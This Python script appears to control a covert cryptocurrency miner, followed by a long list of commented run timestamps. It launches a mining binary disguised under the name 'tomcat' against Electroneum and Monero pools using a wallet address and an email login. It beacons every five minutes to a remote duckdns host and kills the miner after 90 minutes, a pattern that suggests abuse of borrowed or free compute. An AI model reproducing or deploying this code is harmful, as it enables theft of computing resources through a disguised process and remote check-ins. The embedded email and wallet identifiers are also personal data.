import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:56:01.264148
#2018-02-17 16:45:06.163170
#2018-02-17 18:32:03.801885
#2018-02-17 20:20:05.553688
#2018-02-17 22:07:06.083082
#2018-02-17 23:51:04.959654
#2018-02-18 01:41:07.177265
#2018-02-18 03:28:06.578021
#2018-02-18 05:16:04.835236
#2018-02-18 07:08:05.277762
#2018-02-18 08:56:04.015366
#2018-02-18 10:43:03.385938
#2018-02-18 12:28:05.746243
#2018-02-18 14:16:01.364412
#2018-02-18 16:06:07.399226
#2018-02-18 17:55:03.754701
#2018-02-18 19:41:01.240675
#2018-02-18 21:26:01.333853
#2018-02-18 23:15:01.608391
#2018-02-19 01:02:01.967951
#2018-02-19 02:49:04.125802
#2018-02-19 04:36:05.194807
#2018-02-19 06:20:03.675594
#2018-02-19 08:08:05.900523
#2018-02-19 09:58:05.388986
#2018-02-19 11:49:03.876957
#2018-02-19 13:36:01.659392
#2018-02-19 15:25:04.127768
#2018-02-19 17:13:07.627542
#2018-02-19 19:01:08.116683
#2018-02-19 20:46:09.479860
#2018-02-19 22:34:03.903147
#2018-02-20 00:19:06.566822
#2018-02-20 02:07:01.564999
#2018-02-20 03:57:01.521572
#2018-02-20 05:42:03.732872
#2018-02-20 07:27:06.674584
#2018-02-20 09:12:04.440531
#2018-02-20 10:54:09.098324
#2018-02-20 12:42:06.763555
#2018-02-20 14:26:09.584298
#2018-02-20 16:12:10.110199
#2018-02-20 17:57:06.062584
#2018-02-20 19:47:09.728531
#2018-02-20 21:33:07.766948
#2018-02-20 23:17:04.819445
#2018-02-21 01:01:07.269769
#2018-02-21 02:47:06.235774
#2018-02-21 04:34:07.611025
#2018-02-21 06:22:05.189887
#2018-02-21 08:07:07.705233
#2018-02-21 09:53:05.435645
#2018-02-21 11:42:07.252089
#2018-02-21 13:32:08.666474
#2018-02-21 15:17:08.630564
#2018-02-21 17:08:12.266598
#2018-02-21 18:57:10.101594
#2018-02-21 20:46:08.433352
#2018-02-21 22:33:04.571915
#2018-02-22 00:22:08.407974
#2018-02-22 02:11:06.001858
#2018-02-22 03:56:07.556189
#2018-02-22 05:43:06.324410
#2018-02-22 07:28:05.076567
#2018-02-22 09:16:07.992281
#2018-02-22 11:03:05.045170
#2018-02-22 12:49:06.914896
#2018-02-22 14:34:05.750631
#2018-02-22 16:21:05.717377
#2018-02-22 18:09:06.341872
#2018-02-22 19:57:07.458476
#2018-02-22 21:48:05.796621
#2018-02-22 23:35:06.622889
#2018-02-23 01:23:01.497034
#2018-02-23 03:09:02.041999
#2018-02-23 04:56:01.363418
#2018-02-23 06:42:06.539918
#2018-02-23 08:32:05.883878
#2018-02-23 10:47:05.997614
#2018-02-23 12:47:07.047673
#2018-02-23 14:32:08.713624
#2018-02-23 16:22:04.905861
#2018-02-23 18:09:08.707536
#2018-02-23 19:54:07.069390
#2018-02-23 21:39:06.117790
#2018-02-23 23:29:06.740867
#2018-02-24 01:20:03.168553
#2018-02-24 03:11:05.463851
#2018-02-24 04:56:02.245056
#2018-02-24 06:44:05.245491
#2018-02-24 08:35:07.558329
#2018-02-24 10:21:07.157604
#2018-02-24 12:16:06.442162
#2018-02-24 14:08:03.560091
#2018-02-24 15:54:07.361411
#2018-02-24 17:46:06.130999
#2018-02-24 19:35:07.089945
#2018-02-24 21:22:01.957093
#2018-02-25 00:03:01.860776
#2018-02-25 03:17:07.275383
#2018-02-25 07:08:04.935720